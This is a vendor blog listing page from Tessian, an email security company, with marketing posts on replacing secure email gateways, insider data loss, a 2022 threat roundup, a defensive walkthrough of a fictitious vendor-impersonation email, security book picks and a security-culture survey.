Request a Demo of Tessian Today.

Automatically stop data breaches and security threats caused by employees on email. Powered by machine learning, Tessian detects anomalies in real-time, integrating seamlessly with your email environment within minutes and starting protection in a day. Provides you with unparalleled visibility into human security risks to remediate threats and ensure compliance.

Jan 31 Live Webinar | How to Keep Socially Engineered Attacks From Sneaking Into Email | Save Your Seat →

Tessian Blog

  • All
  • Customer Stories
  • Compliance
  • Email DLP
  • Integrated Cloud Email Security
  • Data Science
  • NULL
    array(14) { [0]=> object(WP_Term)#10510 (11) { ["term_id"]=> int(5) ["name"]=> string(16) "Customer Stories" ["slug"]=> string(16) "customer-stories" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(5) ["taxonomy"]=> string(8) "category" ["description"]=> string(155) "Read our latest Customer Stories, interviews and news. Learn how Tessian protects organisations in Financial Services, Legal, Technology and other markets." ["parent"]=> int(2) ["count"]=> int(46) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "2" } [1]=> object(WP_Term)#10514 (11) { ["term_id"]=> int(120) ["name"]=> string(10) "Compliance" ["slug"]=> string(10) "compliance" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(120) ["taxonomy"]=> string(8) "category" ["description"]=> string(143) "Read our latest articles, tips and news on Compliance including GDPR, CCPA and other industry-specific regulations and compliance requirements." ["parent"]=> int(0) ["count"]=> int(39) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "3" } [2]=> object(WP_Term)#11035 (11) { ["term_id"]=> int(116) ["name"]=> string(9) "Email DLP" ["slug"]=> string(20) "data-loss-prevention" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(116) ["taxonomy"]=> string(8) "category" ["description"]=> string(144) "Read our latest articles, tips and industry-specific news around Data Loss Prevention (DLP). Learn about the implications of data loss on email." ["parent"]=> int(0) ["count"]=> int(96) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "2" } [3]=> object(WP_Term)#11029 (11) { ["term_id"]=> int(2) ["name"]=> string(31) "Integrated Cloud Email Security" ["slug"]=> string(20) "human-layer-security" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(2) ["taxonomy"]=> string(8) "category" ["description"]=> string(301) "Integrated Cloud Email Security solutions were introduced as a new category, and positioned as the best defense against advanced phishing threats that evade traditional email security controls.  Learn more about what they are, the benefits of using them, and how you can best evaluate those on offer." ["parent"]=> int(0) ["count"]=> int(131) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "4" } [4]=> object(WP_Term)#10593 (11) { ["term_id"]=> int(486) ["name"]=> string(12) "Data Science" ["slug"]=> string(12) "data-science" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(486) ["taxonomy"]=> string(8) "category" ["description"]=> string(0) "" ["parent"]=> int(0) ["count"]=> int(1) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [5]=> object(WP_Term)#10561 (11) { ["term_id"]=> int(341) ["name"]=> string(17) "Data Exfiltration" ["slug"]=> string(17) "data-exfiltration" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(341) ["taxonomy"]=> string(8) "category" ["description"]=> string(154) "Access Tessian's library of free data exfiltration posts, guides and trend insights. Acidental data loss, insider threats, and misdirected emails content." ["parent"]=> int(116) ["count"]=> int(35) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "2" } [6]=> object(WP_Term)#11074 (11) { ["term_id"]=> int(433) ["name"]=> string(14) "Remote Working" ["slug"]=> string(14) "remote-working" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(433) ["taxonomy"]=> string(8) "category" ["description"]=> string(163) "Access free tips from security leaders and new research related to remote working and hybrid-remote structures. Level-up your cybersecurity for a remote workforce." ["parent"]=> int(116) ["count"]=> int(15) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [7]=> object(WP_Term)#11072 (11) { ["term_id"]=> int(384) ["name"]=> string(7) "Podcast" ["slug"]=> string(7) "podcast" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(384) ["taxonomy"]=> string(8) "category" ["description"]=> string(345) "Cybersecurity podcast series on the human factor, discussing why we need to focus on people - not just machines and data - to stop breaches and empower employees. Tim Sadler, CEO of Tessian meets with business, IT and security leaders to flip the strict on cybersecurity and share best practices, cybersecurity challenges, threat intel and more." ["parent"]=> int(2) ["count"]=> int(9) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [8]=> object(WP_Term)#11076 (11) { ["term_id"]=> int(411) ["name"]=> string(12) "Threat Intel" ["slug"]=> string(19) "threat-intelligence" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(411) ["taxonomy"]=> string(8) "category" ["description"]=> string(155) "Tessian Threat Intelligence and Research team uncovers trends and insights in email security related to phishing, social engineering, and more. Learn more!" ["parent"]=> int(2) ["count"]=> int(21) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "3" } [9]=> object(WP_Term)#11075 (11) { ["term_id"]=> int(3) ["name"]=> string(7) "ATO/BEC" ["slug"]=> string(14) "spear-phishing" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(3) ["taxonomy"]=> string(8) "category" ["description"]=> string(166) "Get up to speed on the latest tips, guides, industry news and technology developments around phishing, spear phishing, Business Email Compromise, and Account Takeover" ["parent"]=> int(0) ["count"]=> int(144) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "5" } [10]=> object(WP_Term)#11073 (11) { ["term_id"]=> int(352) ["name"]=> string(15) "Life at Tessian" ["slug"]=> string(12) "team-culture" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(352) ["taxonomy"]=> string(8) "category" ["description"]=> string(149) "Learn more about Tessian company news, events, and culture directly from different teams. Hear from engineering, product, customer success, and more." ["parent"]=> int(0) ["count"]=> int(42) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "6" } [11]=> object(WP_Term)#11067 (11) { ["term_id"]=> int(435) ["name"]=> string(21) "Interviews With CISOs" ["slug"]=> string(21) "ciso-spotlight-series" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(435) ["taxonomy"]=> string(8) "category" ["description"]=> string(164) "Learn how to navigate the threat landscape, how to get buy-in, and how to break into the industry from these cybersecurity leaders from Shell, Penn State, and more." ["parent"]=> int(0) ["count"]=> int(32) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "7" } [12]=> object(WP_Term)#11066 (11) { ["term_id"]=> int(436) ["name"]=> string(16) "Engineering Team" ["slug"]=> string(16) "engineering-team" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(436) ["taxonomy"]=> string(8) "category" ["description"]=> string(134) "Tessian's engineering team shares tips for solving complex problems. Get advice related to QAs, 502 errors, team management, and more." ["parent"]=> int(352) ["count"]=> int(17) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [13]=> object(WP_Term)#11070 (11) { ["term_id"]=> int(434) ["name"]=> string(16) "Cyber Skills Gap" ["slug"]=> string(16) "cyber-skills-gap" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(434) ["taxonomy"]=> string(8) "category" ["description"]=> string(149) "Learn more about the cybersecurity skills gap and cybersecurity gender gap. Research and interviews with industry leaders and champions of diversity." ["parent"]=> int(435) ["count"]=> int(19) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } }
ATO/BEC
The Time for Cloud Email Security is Now: Microsoft 365 + Tessian
Monday, January 30th, 2023
Cybersecurity incidents have been identified as the leading global risk for businesses in 2023. And why does securing your email matter more than ever? Because email is the leading threat vector for a breach – responsible for up to 90% of all breaches.
A simpler, bygone world Email security has come a long way since its first inception around the year 2000. The greatest external threats facing on-premise mail servers at the time was bulk unsolicited mail and spam. The other big concern was ensuring some form of disaster risk redundancy in case the physical location that stored the mail servers was hit by a disaster like a flood or fire.  
Built for an on-premise world, Secure Email Gateways (SEGs) were focused on solving pretty specific problems. Some vendors focused on filtering spam while others focused on ensuring email communication continually. Enter the cloud  Public cloud adoption started shortly after this period, however it is only in recent years that it has accelerated, displacing on-premise data centers as the new IT infrastructure of choice. Gartner predicts by 2025, 85% of organizations will embrace a cloud-first principle, and 95% of new digital workloads will be deployed in cloud-native platforms – up from 30% in 2021. The accelerated cloud adoption is already starting to pose fundamental questions up and down the IT stack, with the efficacy of security solutions developed for an on-premise world, starting to be drawn into question.  The effectiveness of legacy approaches to email security in particular, has been in the crosshairs for quite some time. This is largely due to the declining effectiveness of Secure Email Gateway (SEG) and the pervasiveness of threats hitting inboxes, with email responsible for over 90% of cyber attacks. More specifically, SEG security effectiveness is declining for two reasons:   SEGs rely on static, signature and rule-based approaches that are ineffective in safeguarding email users and data from advanced threats such as spear phishing attacks.   The majority of enterprises have adopted cloud hosted productivity suites such as Microsoft 365, which natively provide SEG capabilities including malware, phishing and URL protection – resulting in duplication of capabilities, increasing cost and complexity, without the benefit of improved security. Once a threat actor is able to bypass the SEG, they effectively have unmitigated access to carry out their threat campaign. This can (and often does) include Account Takeover (ATO), deploying exploit kits or more damagingly, delivering ransomware. And to compound matters, little protection is offered against insider threats – a growing concern.
The powerful capabilities (and shortcomings) of Microsoft  Microsoft 365, which includes Exchange Online Protection (EOP) and Microsoft 365 Defender for Office, provides a reasonable degree of email security that effectively makes the legacy SEG redundant. M365 on E5 licensing provides the following capabilities: Anti-malware protection Anti-phishing protection Anti-spam protection Data Loss Prevention for email, files and for collaboration platforms such as Sharepoint, OneDrive Insider risk protection  URL rewriting and time-click protection (Safe Links) Attachment sandboxing (Safe Attachments) Message encryption via issued PKI Audit logging Investigate and Respond Quarantine Exchange archiving
Microsoft alone, however, does not guarantee against advanced email threats. Significant gaps remain in Microsoft’s ability to protect against advanced social engineering campaigns that can result in business email compromise (BEC), ATO, or zero day exploitation. And this is why these shortcomings are also reflected in Microsoft’s Service Level Agreement (SLA) exclusions, for example excluding guarantees against zero day exploits and phishing in non-English languages. Its insider risk capabilities and ability to prevent data loss on email  too are limited Microsoft + Tessian = Comprehensive security This is where an intelligent cybersecurity solution like Tessian Cloud Email Security Platform comes into play, providing advanced email threat protection and insider risk protection on email. With Tessian, no mail exchange (MX) records need to be changed. Tessian is able to construct a historical user email pattern map of all email behavior in the organization. The algorithm is then able to detect and prevent threats that Microsoft or SEGs have failed to detect.  This dynamic protection improves with each threat that is prevented, and unlike the in-line static nature of SEGs, it ensures 24/7 real time protection against all attack vectors, including insider threats. That is why the leading enterprises are opting for displacing their legacy SEG and augmenting Microsoft’s native security capabilities with Tessian
Tessian capabilities include: Advanced Spear Phishing Protection Advanced Attachment and URL Protection   Internal Impersonation & CEO Fraud Advanced Spoof Detection Counterparty & Vendor Impersonation  Brand Impersonation Account Takeover  Invoice Fraud Bulk Remediation Automated Quarantine  Threat Intelligence Advanced Insider Risk and Data Loss Prevention  
Improved SOC efficiency with intelligent risk mitigation Tessian clients also see significant efficiency gains in the SOC due to the high degree of automating triage and the enablement of a distilled view on the threats that matter  –  finding that needle in the haystack, in real time and in context.  For example, with one-click, SOC analysts can bulk remediate high volume phishing campaigns (aka burst attacks) that are targeting the organization as they happen. Suspicious emails are also automatically quarantined, with threat remediation context provided.  The platform provides a single pane of glass, giving security and risk leaders visibility of how cybersecurity risk is trending in their organization and the types of threats thwarted, down to individual employee-level risk scoring.
Context aware security awareness training  The context-aware security capability of Tessian extends to providing in-the-moment security awareness coaching to employees. The real-time security notifications flag suspicious and malicious emails received, offer a clear explanation, and coach employees towards safer behavior.  Stopping threats, reducing cost and complexity  Tessian’s advanced protection and insider risk capability frees security teams to focus on mission critical tasks. Legacy email security approaches relying on SEGs simply no longer have a place in an increasingly crowded cybersecurity stack. By leveraging Microsoft 365’s native capability together with Tessian, presents an opportunity for security leaders to improve security while reducing cost and complexity.
Don’t just hear it from us: The value of Tessian’s Cloud Email Security Platform was independently verified by a Forrester study, revealing that a composite enterprise of 10,000 protected inboxes saw 268% Return On Investment (ROI) over three years after deploying Tessian. In addition to the advanced threat prevention and insider risk capabilities delivered by Tessian, this amounted to over 29,600 labor hours saved from having to triage threats and false positives from inboxes.
Read Blog Post
Product
Product Update: Introducing Tessian’s Cloud Email Security Platform’s New Search Functionality
Friday, January 20th, 2023
We’re constantly adding new features and functionality to the Tessian Cloud Email Security Platform, and our latest update lets you find exactly what you need, fast.  At Tessian, our engineering team hosts a Hackathon four times a year a year. The aim is to work as a team, share new ideas, and flex some engineering muscle (see our open engineering roles here). The output should be something that tangentially supports an area of the business. Some examples are: internal tools to optimize a specific process for example, or code that performs a new function or feature. Sometimes though, an idea is so useful, it gets further development beyond the Hackathon and the ultimate prize of being added to the product. At our most recent Hackathon, one team thought the Tessian platform has grown so much that sometimes you just want to get to a specific function fast, without having to navigate in the traditional manner using menus. After all, search has already overtaken navigation in many consumer and mobile apps.  So we’re excited to launch the Tessian Search functionality. Tessian’s search based navigation can be used to quickly access pages across the Tessian Platform. How to Search in Tessian To search for any page or component in the portal, simply open the search on the top right to engage with the search. You can also use the shortcut CTRL+K (on Windows and Mac) or Command+K on Mac.
The obvious benefit is that the user doesn’t have to know exactly where the feature they are looking for is, in order to access it. It also supports synonyms so alternative names can be used to get to the same place. For example, searching for “Threat Prevention Events” and “Defender Events” leads to the same page. We’ve also added support for typos through “fuzzy” searching. For example: Typing “protectd mailb” correctly leads the user to the “Microsoft Office 365 Mailbox Protected Mailboxes”. And the “Recently visited” section shows a list of pages you’ve recently visited in the portal itself. It even supports navigating to specific page sections. For example: “attachment scanning” will lead to the Platform Settings.
What’s more you can add commonly used pages to your favorites, by either clicking the star icon or typing CTRL+Enter. However, favourites and recently visited pages are specific to the browser instance. Meaning that, if you frequently switch browsers, this state will not persist and you may want to save them on each browser. Finally, it supports adding pages to your favourites for quick navigation, by either clicking the star icon in the search modal or by typing CTRLl+Enter (Windows and Mac) or Command+Enter (Mac). Want to see Tessian in action? Book a demo today.    
Read Blog Post
Email DLP, Data Exfiltration
How Tessian Stops Your Data Leaving When Staff Do
by Andrew Webb Wednesday, January 11th, 2023
 As our recent research revealed, 71% of security leaders told us that resignations increase security risks for their organization, and 45% said incidents of data exfiltration increased in 2022, as people took data when they left their jobs. As we head into 2023, the current economic climate coupled with restructuring in most sectors can only add to these concerns. There’s also the security strain felt by everyone who remains the organization as they try to backfill roles and do their jobs under what might be sometimes difficult circumstances. Other challenges include users being more remote, security teams having too many incidents to investigate, and in the colder months – plain old flu. Misdirected #email today (fortunately not at all sensitive – phew) driven by flu-brain 🤒 served as a near miss to remind me why the #security work being done by the team at @Tessian is so important — Sabrina Castiglione (@Castiglione_S) January 9, 2023
Tessian can help remedy insider risks such as these, both malicious exfiltration and accidental data loss, in several ways. Let’s deal with the malicious ones first. As an integrated cloud email security solution, Tessian comes with a variety of policies straight out of the box. Or you can design your own custom policies based on specific actions, teams or data points. 
For example, you might want a policy to flag for severe data exfiltration from staff who you know are leaving. Not only that, you can decide what action to take and simply track exfiltration attempts, warn the user or require justification from their manager before releasing the email. Different teams might have different levels of controls; teams that handle highly sensitive information like sales data or company code or IP, might have more sensitive controls than say marketing. 
How to stop accidental data loss Then of course there’s accidental data loss. Despite training, turning off auto-complete, and Accidental data loss remains a problem for organizations. According to our  Psychology of Human Error report  two in five respondents (40%) have sent work emails to the wrong person. This isn’t just embarrassing, it can result in a loss of business. The same report found that nearly a third (29%) of businesses have lost a client or customer as a result of email recipient errors. Tessian can stop these misdirected emails too, providing in the moment alerts to warn users that something’s not quite right. At Tessian, we’ve built a comprehensive and intelligent cloud email security platform that deploys in seconds via a single API. Using deep content inspection and your historical email data. Tessian forms a behavioral intelligence model that understands how your people use email. We know who they contact, what they send and receive, and what projects they’re working on. Simply put, we know when an incident occurs because we understand how your people usually behave.
Read Blog Post
Integrated Cloud Email Security
How to replace your Secure Email Gateway with an Integrated Cloud Email Security solution
by Andrew Webb Tuesday, December 13th, 2022
Here at Tessian we’ve built the world’s most comprehensive and intelligent cloud email security platform that deploys in minutes via a single API. But what does that ‘soup to nuts’ deployment look like? And when’s best to do it? Well someone who knows in detail is our Senior Sales Engineer, Tam Huynh. We caught up with him to hear how previous Tessian customers have done it in the past.
Briefly explain the history of Integrated Cloud Email Security Integrated Cloud Email Security evolved because of the way Secure Email Gateways handle threats. Historically, you took a look at established data sets and threat signals. You have a static analysis which looks at the hashes of the file, or simply checks the reputation of that hash.  Beyond that they may sandbox that hash to be able to do some behavioral analysis. But a lot of times with account takeovers and business email compromise today, there’s no malicious payloads. ICES evolved to leverage behavioral intelligence or machine learning to analyze the threat signals or the data sets that are missed or ignored by secure email gateways.  So Tessian examines things like the unique writing styles between one person and another, looking for anomalies such as a sudden switch to a more formal salutation or sign off, or unusual IP address location. These are just some of the thousands of threat signals and variables Tessian can analyze.
How long does it take to deploy an Integrated Cloud Email Security solution? The application programming interfaces (APIs) that Tessian uses have given us a way to be able to deploy advanced and intricate solutions to Microsoft 365 in around 20 minutes, depending on how quickly the administrator can get the author credentials. Users enter the credentials inside of our portal, and they grant permissions to the Tessian console, let us know which groups to sync, and they’re done.  If we look back a decade on how SEG were deployed, it could take well over a month or more of multiple phase approaches, changing control windows, testing within a lab or a sandbox first, and then rolling over to production. This is much faster.
How does Tessian work with existing tech stacks as well as new ones?  So from what we’re seeing, many customers are looking to essentially replace their SEGs. So what we’ll typically do is a full feature map of their SEG, and then recommend Microsoft 365 E5 license that allows them to be able to leverage features such as sandboxing and behavioral analysis as well as several other regular features that are found in a SEG. And if some clients choose to retain their SEGs and have 365 E5, that’s fine too.  For organizations not looking to move to Microsoft 365, who might have an on premise exchange server, or are using G Suite, Tessian can leverage a gateway testing deployment, which means an install time of around an hour. And that’s from start to finish. Either way, deploying via the APIs or Gateway means no worrying about modifying MX records.
How should companies communicate ICES to the rest of the business?  So as we’ve seen you can deploy an ICES in under an hour, but that might come as a shock to other teams around the organization, so a clear communication strategy is as important as the technical deployment strategy.  You need to ensure all of the relevant teams have a heads up well ahead of time, especially the non-technical teams. For example, is this going to affect any imminent sales? Does the Customer Success team need to inform customers? Also don’t forget to let the leadership team know. Finally, use the skills of the comms team to help get the information out to the wider organization, and have them on standby in the rare case of there being an issue.  Finally, is there a right time to deploy an ICES?  Yes! Not at 5pm on the penultimate Thursday or Friday in the quarter when sales might be trying to hit target! The ideal time we’ve found with Tessian customers is after business hours on a Monday. The mail volume is down, so it wouldn’t be noticed by the end users.
Read Blog Post
Threat Intel
2022 Tessian Threat Intel Roundup: Social Engineering Threats Are Here to Stay
by John Filitz Thursday, December 8th, 2022
As we close out the year, one thing is certain: Social engineering attacks will remain a mainstay for threat actors. The ease with which threat actors are able to exploit human vulnerabilities will find even the most secure organizations wanting. This is why according to Tessian’s inaugural State of Email Security Report (2022), impersonation attacks are the number 1 concern for organizations globally. Only by adopting a defense-in-depth strategy will organizations be able to reduce the risk of falling victim to social engineering-based attacks.    In this final newsletter for the year we take a look at some of the dominant themes we’ve covered in 2022.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.   
Top Threat Intel Themes Covered in 2022 1. Phishing-as-a-Service Goes Mainstream Phishing remains a persistent threat and security challenge.  Phishing-as-a-Service offerings continue to evolve and proliferate on the dark web, reducing barriers to entry and effectively creating whole new armies of threat actors. Threat actors continue having significant success using phishing and business email compromise campaigns (BEC) to compromise organizations.  This helps explain why social engineering attacks in the form of phishing and BEC are the top two costliest forms of a breach, topping out at $4.91 and $4.89 million, respectively.    2. Impersonation campaigns continue evolving Earlier in the year we started tracking an increase in 3rd party impersonation campaigns that were leveraging PayPal to carry out invoice fraud.  Other impersonation campaigns that came across the wire included threat actors targeting the legal sector – a sector that is disproportionately targeted by social engineering attacks. We’ve also found that obfuscation is the name of the game for malicious payload delivery. The continued persistence of brand impersonation campaigns is also cause for concern. In fact, the FTC reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021.  We expect these trends to continue, evidenced by record breaking phishing activity in 2022, for the first time surpassing 1 million phishing attacks reported in a quarter.    3. The Unrelenting Scourge of Ransomware  One of the recurring themes we have been tracking is the nexus between ransomware and spear phishing attacks.  Ransomware has proven to be a persistent security challenge with the rise of Ransomware-as-a-Service (RaaS) offerings. The increase in ransomware related damages – seeing a 57x increase from 2015 – is one of the main reasons driving up cyber insurance premiums, seeing increases of over 100% in the past 18 months. We expect nation-state and non-aligned threat actors to continue relying on ransomware and related extortion tactics, with email a key threat vector for payload delivery.   4. The rise, and rise, of credential compromises Another trend we have been closely following is the increasing prevalence of credential related compromises. One such noteworthy adversary-in-the-middle (AiTM) compromise saw 10,000 organizations that use Microsoft targeted.   Several large organizations have suffered credential related compromises, shining a spotlight on the fallibility of identity and access management (IAM) solutions in relation to the threat that social engineering poses. Credential compromise social engineering campaigns that target organizations using  Microsoft 365 and Google Workspace collaboration software, will remain a core focus area for threat actors going forward.   5. Event opportunism As so often is the case, cyber criminals, the opportunists that they are, will attempt to exploit international and national events, including acts of war, pandemics and festive events. This reality was on full display at the start of the Russian invasion of Ukraine. We noted that over 70% of newly registered Ukraine themed domains were likely to be malicious. We expected a ramp-up of Russian cyber campaign activity in the wake of the Russian invasion of Ukraine, however this has failed to materialize.  Effective public-private partnerships as demonstrated by Microsoft and others are part of the reason for the unprecedented level of cyber resilience by Ukraine and allied countries.   
Concluding Thoughts & Recommended Actions   Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of social-engineering-related breaches be reduced. Utilizing best-in-breed cybersecurity solutions that have behavioral intelligence-based defensive capabilities, and that reinforce security culture strengthening like Tessian, is increasingly essential to address an ever-evolving social engineering threatscape.    Until next year, stay safe and stay secure.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo.   For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Email DLP, ATO/BEC
How Tessian stops Impersonation Attacks
by Andrew Webb Friday, December 2nd, 2022
Every cyber attack that gets through hurts your organization’s staff, but impersonation attacks are particularly damaging to the individual who’s targeted. In this example, we see how Tessian can stop these types of attacks and protect staff so they can do their best work. 
While attackers will target almost anyone in an organization to gain access, teams in areas closest to the money – namely the finance team.  Finance teams handle hundreds of invoice payments a month, and are responsible for your organization’s cash flow. And when it comes to payroll they interact with every other employee in the company. This is why they represent high value targets to attackers.  There are four types of impersonation; multi-persona, brands, individuals, and vendors. And we’ll look at the last one – vendors – In this example. You can see how the Tessian Cloud Email Security Platform has flagged this email to Calvin in the  finance team asking for an invoice payment. OSINT tools and the victim organization’s own blog and social media might reveal a typical third party that they’ve worked with, in this fictitious example, it’s a supplier called Darkhill Health.  There are several reasons why Tessian has flagged this as a potential impersonation attempt and stopped it from reaching Calvin’s inbox. Let’s look at them in more detail.  Firstly, examination of the URL reveals the letter i in @darkhill-health has been replaced with the number 1.  Furthermore, we can see there is an unusual display name, Philip Davis rather than the typical Philip J Davis found in other emails from Darkhill Heath.  There’s also a fake use of the RE: reply in the subject line, giving the impression that this is part of a sequence of email exchanges, even though it’s the first email in the chain from this fake domain. Finally, and this is one of the hardest things for legacy solutions to determine, there is suspicious financial intent as the sender is requesting updated payment details. Our own State of Spear Phishing report shows that the most successful attacks happen just after lunch, or towards the end of the working day, when people are at their most distracted. Sent at 5:16pm on a Thursday, with just the right sense of urgency, and you can see how your employees could easily fall victim to this type of attack.
How Tessian stops these attacks.  Tessian utilizes behavioral intelligence to gain a deeper understanding of each internal and external relationship. Using deep content inspection, as well as  your historical email data, Tessian forms a behavioral intelligence model that understands how your people use email within the organization. It knows who they contact, what they send and receive, and what projects they’re working on. This advanced behavioral intelligence sits in a single cloud-based email security platform protecting your organization from both advanced incoming threats like the one above AND also stopping sensitive data leaving the organization.  All of this means this attack is stopped dead in its tracks, and never reaches Calvin’s inbox, so he can carry on with his day.
Read Blog Post
Book Recommendations for Security Professionals
by Maddie Rosenthal Wednesday, November 30th, 2022
Looking for some summer reading? We’ve pulled together a little reading guide for when you get some well-earned downtime. We asked around the Tessian offices for recommendations for good reads in the tech and security space. Here’s the team’s recommendations.
Cyber Privacy: Who Has Your Data and Why You Should Care April Falcon Doss Amazon, Google, Facebook, governments. No matter who we are or where we go, someone is collecting our data: to profile us, target us, assess us; to predict our behavior and analyze our attitudes; to influence the things we do and buy — even to impact our vote. Read more at Good Reads     The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats Richard A. Clarke  “Great book on the challenges of cyberwarfare policy” – Paul Sanglé-Ferrière, Product Manager, Tessian. An urgent new warning from two bestselling security experts – and a gripping inside look at how governments, firms, and ordinary citizens can confront and contain the tyrants, hackers, and criminals bent on turning the digital realm into a war zone. Read more at Good Reads   The Wires of War: Technology and the Global Struggle for Power Jacob Helberg From the former news policy lead at Google, an urgent and groundbreaking account of the high-stakes global cyberwar brewing between Western democracies and the autocracies of China and Russia that could potentially crush democracy. Read more at Good Reads   This Is How They Tell Me the World Ends: The Cyberweapons Arms Race Nicole Perlroth Filled with spies, hackers, arms dealers, and a few unsung heroes, written like a thriller and a reference, This Is How They Tell Me the World Ends is an astonishing feat of journalism. Based on years of reporting and hundreds of interviews, The New York Times reporter Nicole Perlroth lifts the curtain on a market in shadow, revealing the urgent threat faced by us all if we cannot bring the global cyber arms race to heel. Read more at Good Reads.   The Art of Invisibility: The World’s Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data Kevin Mitnick & Robert Vamosi  In The Art of Invisibility Mitnick provides both online and real life tactics and inexpensive methods to protect you and your family, in easy step-by-step instructions. He even talks about more advanced “elite” techniques, which, if used properly, can maximize your privacy. Read more at Good Reads The Cuckoo’s Egg Clifford Stoll “Probably the original threat actor report – so good” – Matt Smith, Software Engineer at Tessian In 1986,  Clifford Stoll – a systems administrator at the Lawrence Berkeley National Laboratory – wrote this book. Based on his field notes, this is arguably one of the first documented cases of a computer hack and the subsequent investigation, which eventually led to the arrest of Markus Hess. It’s now considered an essential read for anyone interested in cybersecurity. Read more at Good Reads. CISO Compass: Navigating Cybersecurity Leadership Challenges with Insights from Pioneers  Todd Fitzgerald While this book covers all the fundamentals of IT security governance and risk management, it also digs deeper into people. After all, being a CISO isn’t just about technology. The insights in the book come directly from CISOs. In total, 75 security leaders contributed to the book, which means there’s plenty of actionable advice you can apply to your strategies.  Looking for more insights from security leaders? Check out Tessian’s CISO Spotlight series. Read more at Good Reads.   Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin’s Most Dangerous Hackers  Andy Greenburg Politics play a big role in cybercrime. This book is focused on Sandworm, the group of Russian hackers who, over the last decade, has targeted American utility companies, NATO, and electric grids in Eastern Europe and paralyzed some of the world’s largest businesses with malware. But the author, Wired senior writer Andy Greenberg, also provides plenty of background on both the technology and the relationships between various countries. Read more on Good Reads.   Cult of the Dead Cow Joseph Menn Cult of the Dead Cow is the tale of the oldest, most respected, and most famous American hacking group of all time. Though until now it has remained mostly anonymous, its members invented the concept of hacktivism, released the top tool for testing password security, and created what was for years the best technique for controlling computers from afar, forcing giant companies to work harder to protect customers.  Cult of the Dead Cow explores some of the world’s most infamous hacking groups – particularly the cDc – and explains how technology, data, and – well – the world has changed because of them. Read more at Good Reads. The Making of a Manager: What to Do When Everyone Looks to You Julie Zhuo  Congratulations, you’re a manager! After you pop the champagne, accept the shiny new title, and step into this thrilling next chapter of your career, the truth descends like a fog: you don’t really know what you’re doing. Read more at Good Reads. CISM Certified Information Security Manager All-in-One Exam Guide Yes, this is an exam guide…and yes you should add it to your reading list. If nothing else, to have on-hand as a reference. Why? It covers everything. Security governance, risk management, security program development, and security incident management. Curious as to whether or not other security professionals have their CISM certification? We interviewed 12 women about their journeys in cybersecurity. Read their profiles here and the full report, Opportunity in Cybersecurity Report 2020. Read more on Good Reads. The health benefits of reading Whatever you choose to read these holidays, the health benefits of reading are well documented. As our Lost Hours report revealed, many CISOs aren’t taking time out from their jobs to de-stress and unwind. So make sure you schedule a little you time with a good book.  
Read Blog Post
1 in 3 Employees Do Not Understand the Importance of Cybersecurity
by Andrew Webb Saturday, November 26th, 2022
Our research report into security culture reveals a startling disconnect between security leaders’ views and those of employees when it comes to cybersecurity. Our survey of 2,000 employees in the UK and US revealed that just 39% say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, over two-fifths (42%) of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t care enough about cybersecurity to mention it – a sentiment that should set alarm bells ringing for security leaders.    What’s more, for some staff, this attitude is bleeding into their home life. 20% of employees say they don’t care about cybersecurity at work – over 1 in 10 say they don’t care about it in their personal lives!   It’s clear then, that a significant percentage of employees are simply not engaged with the organization’s cybersecurity procedures and how they play their part in keeping their company secure.
Turning to IT and security leaders, virtually all of the 500 leaders we surveyed (99%) agreed that a strong security culture is important in maintaining a strong security posture. And yet despite rating their organization’s security 8 out 10, on average, three-quarters of organizations experienced a security incident in the last 12 months.    There’s clearly a disconnect here between the views of the SOC team, and those in other teams around the business, and one reason for that could be the reliance on traditional training programs.   48% of security leaders say training is one the most important influences on building a positive security posture. But the reality is that employees aren’t engaged; just 28% of UK and US workers say security awareness training is engaging and only 36% say they’re paying full attention. Of those who are, only half say it’s helpful, while another 50% have had a negative experience with a phishing simulation. 1 in 5 employees don’t even show up for SAT sessions.    As indicated above, the report also reveals a disconnect when it comes to actually reporting security risks and incidents. Eighty percent of security leaders believe robust feedback loops are in place to report incidents, but less than half of employees feel the same, suggesting clearer processes are needed so that security teams have greater visibility of risk in their organization.
